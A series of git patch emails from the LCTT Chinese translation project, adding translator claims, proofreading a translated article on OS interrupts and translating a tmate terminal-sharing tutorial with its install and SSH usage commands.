width="520" height="245"} - ::: - - ::: {.related-inner} - #### [Teleconsole -- A Tool To Share Your Terminal Session Instantly To Anyone In Seconds](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/ "Teleconsole – A Tool To Share Your Terminal Session Instantly To Anyone In Seconds") {#teleconsole-a-tool-to-share-your-terminal-session-instantly-to-anyone-in-seconds .post-title .entry-title} - - ::: {.post-meta .group} - November 6, 2017 - ::: - ::: - -::: {#disqus_thread} -::: -::: -::: - -::: {.sidebar .s1 .collapsed data-position="right" data-layout="col-2cl" data-sb-id="s1"} -[]{.sidebar-toggle} - -::: {.sidebar-content} -::: {.sidebar-top .group} -Follow: - -- [](https://www.facebook.com/2daygeek "Facebook"){.social-tooltip} -- [](https://www.twitter.com/2daygeek "Twitter"){.social-tooltip} -- [](https://www.google.com/+2daygeeks "Google+"){.social-tooltip} -- [](https://www.linkedin.com/company/2daygeek "Linkein"){.social-tooltip} -- [](javascript:void(0) "Pinterest"){.social-tooltip} -- [](http://2daygeek.tumblr.com/ "Tumblr"){.social-tooltip} -::: - -::: {#text-8 .widget .widget_text} -### -- Click Here To Get Offers -- {#click-here-to-get-offers .widget-title} - -::: {.textwidget} -[]{.underline} -::: -::: - -::: {#text-10 .widget .widget_text} -### -- For Better Offers -- {#for-better-offers .widget-title} - -::: {.textwidget} -::: -::: - -::: {#text-12 .widget .widget_text} -### -Unmatched Offers For Linux Users- {#unmatched-offers-for-linux-users- .widget-title} - -::: {.textwidget} -::: -::: - -::: {#wp_subscribe-3 .widget .wp_subscribe} -::: {#wp-subscribe .wp-subscribe-wrap .wp-subscribe .wp-subscribe-1 data-thanks_page="0" data-thanks_page_url="" data-thanks_page_new_window="0"} -#### Get Latest LINUX Tips {#get-latest-linux-tips .title} - -::: {.wp-subscribe-loader} -::: - -Thank you for subscribing. - -Something went wrong. - -::: {.clear} -::: -::: -::: - -::: {#text-3 .widget .widget_text} -::: {.textwidget} -::: -::: - -::: {#text-6 .widget .widget_text} -::: {.textwidget} -::: {#google_translate_element} -::: -::: -::: - -::: {#text-5 .widget .widget_text} -### Follow us {#follow-us .widget-title} - -::: {.textwidget} -::: {.g-page data-href="//plus.google.com/107364365185869631781" data-layout="landscape" data-rel="publisher"} -::: -::: -::: -::: -::: -::: -::: -::: -::: - -::: {#footer-bottom .section .container} -::: {.container-inner} -[](#){#back-to-top} - -::: {.pad .group} -::: {.grid .one-half} -::: {#copyright} -2daygeek.com © 2017. All Rights Reserved. -::: - -::: {#credit style=""} -[2daygeek](https://www.2daygeek.com) :- Linux Tips & Tricks, Linux -How-to Guides & Tutorials is licensed under a [(cc) -BY-NC](https://creativecommons.org/licenses/by-nc/4.0/) -::: -::: - -::: {.grid .one-half .last} -- [](https://www.facebook.com/2daygeek "Facebook"){.social-tooltip} -- [](https://www.twitter.com/2daygeek "Twitter"){.social-tooltip} -- [](https://www.google.com/+2daygeeks "Google+"){.social-tooltip} -- [](https://www.linkedin.com/company/2daygeek "Linkein"){.social-tooltip} -- [](javascript:void(0) "Pinterest"){.social-tooltip} -- [](http://2daygeek.tumblr.com/ "Tumblr"){.social-tooltip} -::: -::: -::: -::: -::: - -::: {#crestashareicon .cresta-share-icon .sameColors .first_style .show-count-active} -::: {#facebook-cresta .sbutton .crestaShadow .facebook-cresta-share .float} -[](https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&t=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds "Share to Facebook") -::: - -::: {#twitter-cresta .sbutton .crestaShadow .twitter-cresta-share .float .withCount} -[](https://twitter.com/share?text=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds&url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&via=2daygeek "Share to Twitter") -::: - -::: {#googleplus-cresta .sbutton .crestaShadow .googleplus-cresta-share .float} -[](https://plus.google.com/share?url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F "Share to Google Plus") -::: - -::: {#linkedin-cresta .sbutton .crestaShadow .linkedin-cresta-share .float} -[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&title=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds&source=https://www.2daygeek.com/ "Share to LinkedIn") -::: - -::: {#pinterest-cresta .sbutton .crestaShadow .pinterest-cresta-share .float} -[](https://pinterest.com/pin/create/bookmarklet/?url=https%3A%2F%2Fwww.2daygeek.com%2Ftmate-instantly-share-your-terminal-session-to-anyone-in-seconds%2F&media=https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds.png&description=tmate+%E2%80%93++Instantly+Share+Your+Terminal+Session+To+Anyone+In+Seconds "Share to Pinterest") -::: - -::: {#total-shares .sbutton} -[]{#total-count .cresta-the-total-count}[Shares]{.cresta-the-total-text} -::: - -::: {style="clear: both;"} -::: -::: - -::: {#spu-bg} -::: - -::: {#spu-main} -[Close](#){#spu-close} - -::: {#spu-title} -Please support the site -::: - -::: {#spu-msg-cont} -::: {#spu-msg} -By clicking any of these buttons you help our site to get better - -::: {.spu-button .spu-twitter} -[Follow Me](https://twitter.com/2daygeek){.twitter-follow-button} -::: - -::: {.spu-button .spu-facebook} -::: {#fb-root} -::: - -::: {.fb-like data-href="https://www.facebook.com/2daygeek" data-send="false" data-width="450" data-show-faces="true" data-layout="button_count"} -::: -::: - -::: {.spu-button .spu-google} -::: {.g-plusone data-callback="googleCB" data-onendinteraction="closeGoogle" data-recommendations="false" data-annotation="bubble" data-size="medium" data-href="https://www.google.com/+2daygeeks"} -::: -::: -::: - -::: {.step-clear} -::: -::: - -[]{#spu-timer} - -::: {#spu-bottom} -::: -::: +[Remote System Output] +[server exited] +Connection to sg2.tmate.io closed by remote host. +Connection to sg2.tmate.io closed. +``` -------------------------------------------------------------------------------- via: https://www.2daygeek.com/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds/ -作者:[ ][a] +作者:[ Magesh Maruthamuthu ][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) From 0d433d8d60be8594dcfe4f692f0d47bce348678a Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Wed, 29 Nov 2017 17:40:53 +0800 Subject: [PATCH 0064/1627] Update 20171124 How to Install Android File Transfer for Linux.md --- .../20171124 How to Install Android File Transfer for Linux.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171124 How to Install Android File Transfer for Linux.md b/sources/tech/20171124 How to Install Android File Transfer for Linux.md index b5078c2e01..4a9e04b49a 100644 --- a/sources/tech/20171124 How to Install Android File Transfer for Linux.md +++ b/sources/tech/20171124 How to Install Android File Transfer for Linux.md @@ -1,3 +1,4 @@ +Translating by wenwensnow # How to Install Android File Transfer for Linux If you’re struggling to mount your Android phone on Ubuntu you might want to give [Android File Transfer for Linux][4] a try. From f9691b39881f2f9707b7fc43c71a2015d4d8109f Mon Sep 17 00:00:00 2001 From: keyld Date: Wed, 29 Nov 2017 17:53:44 +0800 Subject: [PATCH 0065/1627] KeyLD translating --- .../20171124 Photon Could Be Your New Favorite Container OS.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md index 9b8a98a9dd..147a2266cc 100644 --- a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -1,3 +1,5 @@ +KeyLD Translating + Photon Could Be Your New Favorite Container OS ============================================================ From a45c0b813662fdea0f67954d0964f7747aac0fa0 Mon Sep 17 00:00:00 2001 From: wangy325 Date: Wed, 29 Nov 2017 18:08:10 +0800 Subject: [PATCH 0066/1627] wangy325 translating --- ...rce Cloud Skills and Certification Are Key for SysAdmins.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md index e1237760b0..27379cbe40 100644 --- a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md +++ b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md @@ -1,3 +1,6 @@ +translating by wangy325... + + Open Source Cloud Skills and Certification Are Key for SysAdmins ============================================================ From d410a07fa5881d08dd4a13f80dab53ed2ee1da93 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 29 Nov 2017 18:44:30 +0800 Subject: [PATCH 0067/1627] translating by darksun --- ... Instantly Share Your Terminal Session To Anyone In Seconds.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md index b4747d8a65..6ed960de15 100644 --- a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md +++ b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md @@ -1,3 +1,4 @@ +translating by darksun tmate -- Instantly Share Your Terminal Session To Anyone In Seconds ================= From f1a182bf5b92d5d7fc053722a42e96bd116e3fd1 Mon Sep 17 00:00:00 2001 From: vpainter <934564727@qq.com> Date: Wed, 29 Nov 2017 22:06:45 +0800 Subject: [PATCH 0068/1627] voidpainter is translating voidpainter is translating --- sources/tech/20170908 Betting on the Web.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170908 Betting on the Web.md b/sources/tech/20170908 Betting on the Web.md index 84d70e164f..80d0002a80 100644 --- a/sources/tech/20170908 Betting on the Web.md +++ b/sources/tech/20170908 Betting on the Web.md @@ -1,3 +1,5 @@ +voidpainter is translating +--- [Betting on the Web][27] ============================================================ From 02c74d0989f14d0ee27779c369b513b43eb3d984 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 29 Nov 2017 22:31:32 +0800 Subject: [PATCH 0069/1627] PRF:20141028 When Does Your OS Run.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @Cwndmiao 翻译的很好! --- .../tech/20141028 When Does Your OS Run.md | 36 ++++++++++--------- 1 file changed, 20 insertions(+), 16 deletions(-) diff --git a/translated/tech/20141028 When Does Your OS Run.md b/translated/tech/20141028 When Does Your OS Run.md index 893dd9fb48..80ec1340c8 100644 --- a/translated/tech/20141028 When Does Your OS Run.md +++ b/translated/tech/20141028 When Does Your OS Run.md @@ -1,46 +1,50 @@ 操作系统何时运行? ============================================================ +请各位思考以下问题:在你阅读本文的这段时间内,计算机中的操作系统在**运行**吗?又或者仅仅是 Web 浏览器在运行?又或者它们也许均处于空闲状态,等待着你的指示? -请各位思考以下问题:在你阅读本文的这段时间内,计算机中的操作系统在运行吗?又或者仅仅是 Web 浏览器在运行?又或者他们也许均处于空闲状态,等待着你的指示? +这些问题并不复杂,但它们深入涉及到系统软件工作的本质。为了准确回答这些问题,我们需要透彻理解操作系统的行为模型,包括性能、安全和除错等方面。在该系列文章中,我们将以 Linux 为主举例来帮助你建立操作系统的行为模型,OS X 和 Windows 在必要的时候也会有所涉及。对那些深度探索者,我会在适当的时候给出 Linux 内核源码的链接。 -这些问题并不复杂,但他们深入涉及到系统软件工作的本质。为了准确回答这些问题,我们需要透彻理解操作系统的行为模型,包括性能、安全和除错等方面。在该系列文章中,我们将以 Linux 为主举例来帮助你建立操作系统的行为模型,OS X 和 Windows 在必要的时候也会有所涉及。对那些深度探索者,我会在适当的时候给出 Linux 内核源码的链接。 +这里有一个基本认知,就是,在任意给定时刻,某个 CPU 上仅有一个任务处于活动状态。大多数情形下这个任务是某个用户程序,例如你的 Web 浏览器或音乐播放器,但它也可能是一个操作系统线程。可以确信的是,它是**一个任务**,不是两个或更多,也不是零个,对,**永远**是一个。 -这里有一个基本认知,就是,在任意给定时刻,某个 CPU 上仅有一个任务处于活动状态。大多数情形下这个任务是某个用户程序,例如你的 Web 浏览器或音乐播放器,但他也可能是一个操作系统线程。可以确信的是,他是一个任务,不是两个或更多,也不是零个,对,永远是一个。 +这听上去可能会有些问题。比如,你的音乐播放器是否会独占 CPU 而阻止其它任务运行?从而使你不能打开任务管理工具去杀死音乐播放器,甚至让鼠标点击也失效,因为操作系统没有机会去处理这些事件。你可能会愤而喊出,“它究竟在搞什么鬼?”,并引发骚乱。 -这听上去可能会有些问题。比如,你的音乐播放器是否会独占 CPU 而阻止其他任务运行?从而使你不能打开任务管理工具去杀死音乐播放器,甚至让鼠标点击也失效,因为操作系统没有机会去处理这些事件。你可能会奋而喊出,“他究竟在搞什么鬼?”,并引发骚乱。 +此时便轮到**中断**大显身手了。中断就好比,一声巨响或一次拍肩后,神经系统通知大脑去感知外部刺激一般。计算机主板上的[芯片组][1]同样会中断 CPU 运行以传递新的外部事件,例如键盘上的某个键被按下、网络数据包的到达、一次硬盘读取的完成,等等。硬件外设、主板上的中断控制器和 CPU 本身,它们共同协作实现了中断机制。 -此时便轮到中断大显身手了。中断就好比,一声巨响或一次拍肩后,神经系统通知大脑去感知外部刺激一般。计算机主板上的芯片组同样会中断 CPU 运行以传递新的外部事件,例如键盘上的某个键被按下、网络数据包的到达、一次硬盘读的完成,等等。硬件外设、主板上的中断控制器和 CPU 本身,他们共同协作实现了中断机制。 +中断对于记录我们最珍视的资源——时间——也至关重要。计算机[启动过程][2]中,操作系统内核会设置一个硬件计时器以让其产生周期性**计时中断**,例如每隔 10 毫秒触发一次。每当计时中断到来,内核便会收到通知以更新系统统计信息和盘点如下事项:当前用户程序是否已运行了足够长时间?是否有某个 TCP 定时器超时了?中断给予了内核一个处理这些问题并采取合适措施的机会。这就好像你给自己设置了整天的周期闹铃并把它们用作检查点:我是否应该去做我正在进行的工作?是否存在更紧急的事项?直到你发现 10 年时间已逝去…… -中断对于簿记我们最珍视的资源--时间也至关重要。计算机启动过程中,操作系统内核会设置一个硬件计时器以让其产生周期性计时中断,例如每隔 10 毫秒触发一次。每当计时中断到来,内核便会收到通知以更新系统统计信息和盘点如下事项:当前用户程序是否已运行了足够长时间?是否有某个 TCP 定时器超时了?中断给予了内核一个处理这些问题并采取合适措施的机会。这就好像你给自己设置了整天的周期闹铃并把他们用作检查点:我是否应该去做我正在进行的工作?是否存在更紧急的事项?直到你发现 10 年时间已逝去。。。 +这些内核对 CPU 周期性的劫持被称为滴答tick,也就是说,是中断让你的操作系统滴答了一下。不止如此,中断也被用作处理一些软件事件,如整数溢出和页错误,其中未涉及外部硬件。**中断是进入操作系统内核最频繁也是最重要的入口**。对于学习电子工程的人而言,这些并无古怪,它们是操作系统赖以运行的机制。 -这些内核对 CPU 周期性的劫持被称为滴答,也就是说,是中断让操作系统经历了滴答的过程。不止如此,中断也被用作处理一些软件事件,如整数溢出和页错误,其中未涉及外部硬件。中断是进入操作系统内核最频繁也是最重要的入口。对于学习电子工程的人而言,这些并无古怪,他们是操作系统赖以运行的机制。 - -说到这里,让我们再来看一些实际情形。下图示意了 Intel Core i5 系统中的一个网卡中断。图片现在设置了超链,你可以点击他们以获取更为详细的信息,例如每个设备均被链接到了对应的 Linux 驱动源码。 +说到这里,让我们再来看一些实际情形。下图示意了 Intel Core i5 系统中的一个网卡中断。图片中的部分元素设置了超链,你可以点击它们以获取更为详细的信息,例如每个设备均被链接到了对应的 Linux 驱动源码。 ![](http://duartes.org/gustavo/blog/img/os/hardware-interrupt.png) - +链接如下: -让我们来仔细研究下。首先,由于系统中存在众多中断源,如果硬件只是通知 CPU “嘿,这里发生了一些事情”然后什么也不做,则不太行得通。这会带来难以忍受的冗长等待。因此,计算机上电时,每个设备都被授予了一根中断线,或者称为 IRQ。这些 IRQ 然后被系统中的中断控制器映射成值介于 0 到 255 之间的中断向量。等到中断到达 CPU,他便具备了一个定义良好的数值,异于硬件的某些其他诡异行为。 +- network card : https://github.com/torvalds/linux/blob/v3.17/drivers/net/ethernet/intel/e1000e/netdev.c +- USB keyboard : https://github.com/torvalds/linux/blob/v3.16/drivers/hid/usbhid/usbkbd.c +- I/O APIC : https://github.com/torvalds/linux/blob/v3.16/arch/x86/kernel/apic/io_apic.c +- HPET : https://github.com/torvalds/linux/blob/v3.17/arch/x86/kernel/hpet.c -相应地,CPU 中还存有一个由内核维护的指针,指向一个包含 255 个函数指针的数组,其中每个函数被用来处理某个特定的中断向量。后文中,我们将继续深入探讨这个数组,他也被称作中断描述符表(IDT)。 +让我们来仔细研究下。首先,由于系统中存在众多中断源,如果硬件只是通知 CPU “嘿,这里发生了一些事情”然后什么也不做,则不太行得通。这会带来难以忍受的冗长等待。因此,计算机上电时,每个设备都被授予了一根**中断线**,或者称为 IRQ。这些 IRQ 然后被系统中的中断控制器映射成值介于 0 到 255 之间的**中断向量**。等到中断到达 CPU,它便具备了一个完好定义的数值,异于硬件的某些其它诡异行为。 + +相应地,CPU 中还存有一个由内核维护的指针,指向一个包含 255 个函数指针的数组,其中每个函数被用来处理某个特定的中断向量。后文中,我们将继续深入探讨这个数组,它也被称作**中断描述符表**(IDT)。 每当中断到来,CPU 会用中断向量的值去索引中断描述符表,并执行相应处理函数。这相当于,在当前正在执行任务的上下文中,发生了一个特殊函数调用,从而允许操作系统以较小开销快速对外部事件作出反应。考虑下述场景,Web 服务器在发送数据时,CPU 却间接调用了操作系统函数,这听上去要么很炫酷要么令人惊恐。下图展示了 Vim 编辑器运行过程中一个中断到来的情形。 ![](http://duartes.org/gustavo/blog/img/os/vim-interrupted.png) -此处请留意,中断的到来是如何触发 CPU 到 Ring 0 内核模式的切换而未有改变当前活跃的任务。这看上去就像,Vim 编辑器直接面向操作系统内核产生了一次神奇的函数调用,但 Vim 还在那里,他的地址空间原封未动,等待着执行流返回。 +此处请留意,中断的到来是如何触发 CPU 到 [Ring 0][3] 内核模式的切换而未有改变当前活跃的任务。这看上去就像,Vim 编辑器直接面向操作系统内核产生了一次神奇的函数调用,但 Vim 还在那里,它的[地址空间][4]原封未动,等待着执行流返回。 -这很令人振奋,不是么?不过让我们暂且告一段落吧,我需要合理控制篇幅。我知道还没有回答完这个开放式问题,甚至还实质上翻开了新的问题,但你至少知道了在你读这个句子的同时滴答正在发生。我们将在充实了对操作系统动态行为模型的理解之后再回来寻求问题的答案,对 Web 浏览器情形的理解也会变得清晰。如果你仍有问题,尤其是在这篇文章公诸于众后,请尽管提出。我将会在文章或后续评论中回答他们。下篇文章将于明天在 RSS 和 Twitter 上发布。 +这很令人振奋,不是么?不过让我们暂且告一段落吧,我需要合理控制篇幅。我知道还没有回答完这个开放式问题,甚至还实质上翻开了新的问题,但你至少知道了在你读这个句子的同时**滴答**正在发生。我们将在充实了对操作系统动态行为模型的理解之后再回来寻求问题的答案,对 Web 浏览器情形的理解也会变得清晰。如果你仍有问题,尤其是在这篇文章公诸于众后,请尽管提出。我将会在文章或后续评论中回答它们。下篇文章将于明天在 RSS 和 Twitter 上发布。 -------------------------------------------------------------------------------- via: http://duartes.org/gustavo/blog/post/when-does-your-os-run/ -作者:[gustavo ][a] +作者:[gustavo][a] 译者:[Cwndmiao](https://github.com/Cwndmiao) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 703c66f461c3867f08199cd268f5f4f6daebc458 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 29 Nov 2017 22:32:29 +0800 Subject: [PATCH 0070/1627] PUB:20141028 When Does Your OS Run.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @Cwndmiao 恭喜你完成了第一篇翻译,文章发布地址: https://linux.cn/article-9095-1.html ,你的 LCTT 专页地址: https://linux.cn/lctt/Cwndmiao --- {translated/tech => published}/20141028 When Does Your OS Run.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20141028 When Does Your OS Run.md (100%) diff --git a/translated/tech/20141028 When Does Your OS Run.md b/published/20141028 When Does Your OS Run.md similarity index 100% rename from translated/tech/20141028 When Does Your OS Run.md rename to published/20141028 When Does Your OS Run.md From c91e776663a06931d6a282d99710d77485f73516 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Thu, 30 Nov 2017 00:01:15 +0800 Subject: [PATCH 0071/1627] yunfengHe apply for translation --- sources/tech/20171120 Containers and Kubernetes Whats next.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md index 52f3364d31..ff9d2bf08a 100644 --- a/sources/tech/20171120 Containers and Kubernetes Whats next.md +++ b/sources/tech/20171120 Containers and Kubernetes Whats next.md @@ -1,3 +1,4 @@ +Yunfeng applying for translation. Containers and Kubernetes: What's next? ============================================================ From 72c02857ab5e52ba2e24bb227a6b11f8ebde46f0 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Thu, 30 Nov 2017 00:04:05 +0800 Subject: [PATCH 0072/1627] Yunfeng Translating --- sources/tech/20171120 Containers and Kubernetes Whats next.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md index ff9d2bf08a..b73ccb21c2 100644 --- a/sources/tech/20171120 Containers and Kubernetes Whats next.md +++ b/sources/tech/20171120 Containers and Kubernetes Whats next.md @@ -1,4 +1,4 @@ -Yunfeng applying for translation. +YunfengHe Translating Containers and Kubernetes: What's next? ============================================================ From 148c5365cde7b334eda51d2429b71684ed8e3850 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 30 Nov 2017 00:35:17 +0800 Subject: [PATCH 0073/1627] translated --- ...our Terminal Session To Anyone In Seconds.md | 116 +++++++----------- 1 file changed, 43 insertions(+), 73 deletions(-) diff --git a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md index 6ed960de15..2f6d6fe3c7 100644 --- a/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md +++ b/sources/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md @@ -1,49 +1,31 @@ -translating by darksun -tmate -- Instantly Share Your Terminal Session To Anyone In Seconds +tmate -- 秒级分享你的终端会话 ================= -A while ago, we wrote about -[teleconsole](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/) -which is used to share terminal instantly to anyone (whoever you trusting). Today also we are going to discuss about same kind of -application called tmate. +不久前,我们写过一篇关于 [teleconsole](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/) 的介绍,该工具可用于快速分享终端给任何人(任何你信任的人)。今天我们要聊一聊另一款类似的应用,名叫 `tmate`。 -Why you want tmate application? this will help you to get help from your -friends when you need. +`tmate` 有什么用? 它可以让你在需要帮助时向你的朋友们求助。 -### What Is tmate? +### 什么是 tmate? -[tmate](https://tmate.io/) stands for teammates, it's a fork of tmux, -and uses the same configurations such as keybindings, color schemes etc. -It's a terminal multiplexer with instant terminal sharing. it enables a -number of terminals to be created, accessed, and controlled from a -single screen, that can be shared with another mates. +[tmate](https://tmate.io/) 的意思是 `teammates`, 它是 tmux 的一个分支,并且使用相同的配置信息(例如快捷键配置,配色方案等). +它是一个终端多路复用器,同时具有即时分享终端的能力。它允许在单个屏幕中创建并操控多个终端,同时这些终端还能与其他同事分享。 -You can detach the session by leaving the job running in background and -re-attach the session when you want to view the status. tmate provides -an instant pairing solution, allowing you to share a terminal with one -or several teammates. +你可以分离会话,让作业在后台运行,然后在想要查看状态时重新连接会话. `tmate` 提供了一个即时配对的方案, 让你可以与一个或多个队友共享一个终端. -A status line at the bottom of the screen shows information on the -current session, such as ssh command to share with your mate. +在屏幕的地步有一个状态栏,显示了当前会话的一些诸如 ssh 命令之类的共享信息. -### How tmate works? +### tmate 是怎么工作的? -- When launching tmate, an ssh connection is established to tmate.io - (backend servers maintained by tmate developers) in the background - through libssh. -- The server (tmate.io) ssh key signatures are verified during the DH - exchange. -- The client is authenticated with local ssh keys. -- Once connection is established, a 150 bits (non guessable random - characters) session token is generated by local tmux server. -- teammates can connect to tmate.io using the SSH session ID provided - by user +- 运行 `tmate` 时, 会通过 `libssh` 在后台创建一个连接到 tmate.io (由 tmate 开发者维护的后台服务器)的ssh 连接. +- 服务器 (tmate.io) 的 ssh 密钥前面通过 DH 交换进行校验. +- 客户端通过本地 ssh 密钥进行认证. +- 连接创建后, 本地 tmux 服务器会生成一个 150 位(不可猜测的随机字符)会话令牌. +- 队友能通过用户提供的 SSH 会话 ID 连接到 tmate.io. -### Prerequisites for tmate +### 使用 tmate 的必备条件 -Generate SSH key as a prerequisites since tmate.io server authenticate -client machine through local ssh keys. Make a note, every system should -have SSH key. +由于 `tmate.io` 服务器需要通过本地 ssh 密钥来认证客户机,因此其中一个必备条件就是生成 SSH 密钥 key. +记住, 每个系统都要有自己的 SSH 密钥. ```shell $ ssh-keygen -t rsa Generating public/private rsa key pair. @@ -68,13 +50,12 @@ The key's randomart image is: +----[SHA256]-----+ ``` -### How to Install tmate +### 如何安装 tmate -tmate is available in few of the distribution official repository that -can be installed through package manager. +`tmate` 已经包含在某些发行版的官方仓库中,可以通过包管理器来安装. -For **`Debian/Ubuntu`**, use [APT-GET Command](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) -or [APT Command](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to install tmate. +对于 **`Debian/Ubuntu`**, 可以使用 [APT-GET 命令](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) +或者 [APT 命令](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to 来安装. ```shell $ sudo apt-get install software-properties-common @@ -83,86 +64,75 @@ $ sudo apt-get update $ sudo apt-get install tmate ``` -Also, you can install tmate package from distribution official repository. +你也可以从官方仓库中安装 tmate. ```shell $ sudo apt-get install tmate ``` -For **`Fedora`**, use [DNF Command](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) -to install tmate. +对于 **`Fedora`**, 使用 [DNF 命令](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) 来安装. ```shell $ sudo dnf install tmate ``` -For **`Arch Linux`** based systems, use []()[Yaourt Command](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) -or []()[Packer Command](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) -to install tmate from AUR repository. +对于基于 **`Arch Linux`** 的系统, 使用 []()[Yaourt 命令](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) +或 []()[Packer 命令](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) 来从 AUR 仓库中安装. ```shell $ yaourt -S tmate ``` -or +或 ```shell $ packer -S tmate ``` -For **`openSUSE`**, use [Zypper Command](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) -to install tmate. +对于 **`openSUSE`**, 使用 [Zypper 命令](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) 来安装. ```shell $ sudo zypper in tmate ``` -### How To Use tmate +### 如何使用 tmate -After successfully installed, open your terminal and fire the following -command which will open the new session for you and in the bottom of the -screen you can able to see the SSH session ID. +成功安装后, 打开终端然后输入下面命令,就会打开一个新的会话,在屏幕底部,你能看到 SSH 会话的 ID. ```shell $ tmate ``` -[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) -Make a note, the SSH session ID will disappear after a few seconds, so -don't worry you can get those details using following command. +要注意的是, SSH 会话 ID 会在几秒后消失, 不过不要紧,你可以通过下面命令获取到这些详细信息. ```shell $ tmate show-messages ``` -The tmate show-messages command allows you to see tmate's log messages, -including the ssh connection string.\ -[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) +`tmate` 的 `show-messages` 命令会显示 tmate 的 log 信息,其中包含了 ssh 连接内容。 +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) -Now, share your SSH session ID to your friends or coworkers and allow -them to view the terminal session. Not only SSH session ID, -alternatively you can share web URL as well, also you can share either -read only sessions or read-write sessions? +现在, 分享你的 SSH 会话 ID 给你的朋友或同事从而允许他们观看终端会话. 除了 SSH 会话 ID 以外,你也可以分享 web URL。 +另外你还可以选择分享的是只读会话还是可读写会话。 -### How to connect session through SSH +### 如何通过 SSH 连接会话 -Just run the SSH session ID which you got from your friend on terminal. -It's like similar to below. +只需要在终端上运行你从朋友那得到的 SSH 终端 ID 就行了. 类似下面这样。 ```shell -$ ssh session: ssh [email protected] +$ ssh session: ssh 3KuRj95sEZRHkpPtc2y6jcokP@sg2.tmate.io ``` -[](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) 